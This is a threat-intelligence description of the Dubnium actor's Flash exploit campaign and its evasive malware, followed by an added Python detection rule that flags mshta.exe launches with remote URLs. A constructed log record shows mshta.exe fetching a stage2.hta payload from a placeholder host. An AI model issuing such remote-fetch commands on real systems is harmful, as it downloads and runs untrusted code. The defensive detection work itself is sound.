Dubnium is a threat actor known for conducting malicious operations, primarily through malware. Its activity drew particular notice in December, when it launched a campaign exploiting Adobe Flash Player. That exploit was used to distribute several samples of Dubnium's malware, one of which carried a zero-day exploit specifically targeting Adobe Flash. Dubnium's malware goes to considerable lengths to disguise itself, typically posing as a Secure Shell (SSH) tool. Even so, its initial payload is not particularly advanced in its functionality.
Dubnium has developed sophisticated techniques to hide its internal operations and evade detection. For example, it encodes every string related to its malicious code and then takes an additional step to obscure its activity further. The Dubnium binary also extensively checks the running environment, including everyday programs and security applications, which can be used to profile its targets. It likewise screens for program analysis tools such as Pin and DynamoRIO.
One notable characteristic of Dubnium's methodology is its highly organized exploit code, with broad support for different operating system flavors. After spawning an mshta.exe process with the URL to download, the malware waits, then opens the mshta.exe process and searches its open file handles for one associated with the downloaded content. This level of meticulousness underlines the threat Dubnium poses, despite the relatively unadvanced nature of its first-stage payload.
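The mshta.exe download step described above is observable in endpoint telemetry. The following is an added detection example (not code from the original description or from any Dubnium sample): it scans constructed Sysmon-style process-creation records and flags any mshta.exe launch whose command line carries a remote URL, which is how the stager hands its download off to mshta.exe. The sample records, field names and URLs are assumptions made for illustration.

```python
import re
from dataclasses import dataclass

# Constructed process-creation records in a Sysmon Event ID 1 style (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" http://example.invalid/stage2.hta',
     "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",          # local .hta, no remote URL
     "CommandLine": r'"C:\Windows\System32\mshta.exe" C:\Users\alice\local.hta',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",        # URL argument, but not mshta
     "CommandLine": r'"C:\Windows\System32\notepad.exe" https://example.invalid/notes.txt',
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# Any http(s)/ftp URL appearing as a command-line argument.
URL_ARG = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)


@dataclass
class Finding:
    command_line: str
    parent_image: str   # kept for triage: which process handed the URL to mshta.exe
    url: str


def is_mshta(image: str) -> bool:
    """True when the image path ends in mshta.exe (case-insensitive, any directory)."""
    return image.rsplit("\\", 1)[-1].lower() == "mshta.exe"


def find_remote_mshta(events) -> list:
    """Return one Finding per mshta.exe launch whose command line contains a remote URL."""
    findings = []
    for ev in events:
        if not is_mshta(ev.get("Image", "")):
            continue
        match = URL_ARG.search(ev.get("CommandLine", ""))
        if match:
            findings.append(Finding(ev["CommandLine"], ev.get("ParentImage", ""), match.group(0)))
    return findings


if __name__ == "__main__":
    for f in find_remote_mshta(SAMPLE_EVENTS):
        print(f"mshta.exe fetching {f.url} (parent: {f.parent_image})")
```

Only the first constructed record is flagged: the local .hta launch and the non-mshta process with a URL argument are left alone, which keeps the rule narrow enough to run over a full day of process-creation logs.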
Description last updated: 2024-05-04T16:25:46.548Z